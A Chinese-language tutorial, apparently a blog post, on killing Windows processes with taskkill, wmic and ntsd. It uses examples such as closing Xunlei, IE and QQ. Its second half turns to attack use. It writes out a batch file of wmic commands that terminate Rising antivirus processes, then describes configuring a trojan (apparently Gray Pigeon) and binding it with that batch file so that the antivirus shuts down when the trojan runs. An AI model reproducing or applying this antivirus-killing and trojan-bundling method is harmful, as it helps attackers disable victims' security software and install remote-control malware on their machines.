點(diǎn)擊電腦桌面的左下角“開始”菜單或 windows鍵+R鍵輸入cmd回車；

cmd下命令殺進(jìn)程的幾個(gè)方法:

1、用taskill命令
①taskkill /f /im 進(jìn)程名稱
示例:用taskkill /f /im VStart.exe命令關(guān)閉音速啟動(dòng),VStart.exe就是音速啟動(dòng)的進(jìn)程名稱

②taskkill /pid[進(jìn)程碼] -t(結(jié)束該進(jìn)程) -f(強(qiáng)制結(jié)束該進(jìn)程以及所有子進(jìn)程)
注:有兩種方法查進(jìn)程的PID碼:
①在命令行下用 tasklist 命令查出進(jìn)程的PID號(hào)碼,就是這些

②在任務(wù)管理器中的查看選項(xiàng)中選擇選擇列中勾先PID那一項(xiàng)

示例:舉個(gè)關(guān)閉迅雷的例子,先找出迅雷的PID碼2552
taskkill /pid 2552 -f,就是這個(gè)指令

2、用 wmic process Where name="進(jìn)程名稱" call terminate 這個(gè)不需要知道進(jìn)程的PID號(hào)
示例:
wmic process Where name="iexplore.exe" call terminate 關(guān)閉IE瀏覽器,
3、ntsd -c q -p [pid進(jìn)程碼]
示例:還是舉個(gè)關(guān)閉迅雷的吧,同樣先找出迅雷的PID碼2724
ntsd -c q -p 2724 是這條指令!

這樣關(guān)進(jìn)程有什么作用呢?

    一方面遇到不能用任務(wù)管理器結(jié)束的進(jìn)程可以試試上面的方法,而且用wmic process where name="進(jìn)程名稱" call terminate和taskkill /im 進(jìn)程名稱這兩條可以同時(shí)關(guān)閉多個(gè)進(jìn)程名相同的進(jìn)程,舉個(gè)關(guān)2個(gè)QQ的例子吧,已經(jīng)打開了兩個(gè)QQ程序,wmic process where name="QQ.exe" call terminate,我們來執(zhí)行一下看看,看到了吧,兩個(gè)QQ都關(guān)閉了.

    另一方面我們利用上面的命令可以做個(gè)關(guān)殺毒軟件的批處理,然后把批處理文件和木馬捆綁在一起,這樣運(yùn)行木馬的時(shí)候就關(guān)閉了殺毒軟件,下面看我操作

    1、先建立一個(gè)關(guān)閉殺毒軟件進(jìn)程的批處理文件,這里我以關(guān)閉瑞星為例,說明一下我的瑞星已

經(jīng)關(guān)閉了監(jiān)控系統(tǒng),所以這些就不用了:

    wmic process where name="RavTask.exe" call terminate

    wmic process where name="CCenter.exe" call terminate

    wmic process where name="RavmonD.exe" call terminate

    wmic process where name="Ravmon.exe" call terminate

    wmic process where name="RavStub.exe" call terminate

    2、配置一個(gè)木馬,配個(gè)鴿子吧

    3、用文件捆綁器將批處理文件和木馬捆綁到一起,這里我隨便找個(gè)文件捆綁器,不是免殺的.

• cmd
• 進(jìn)程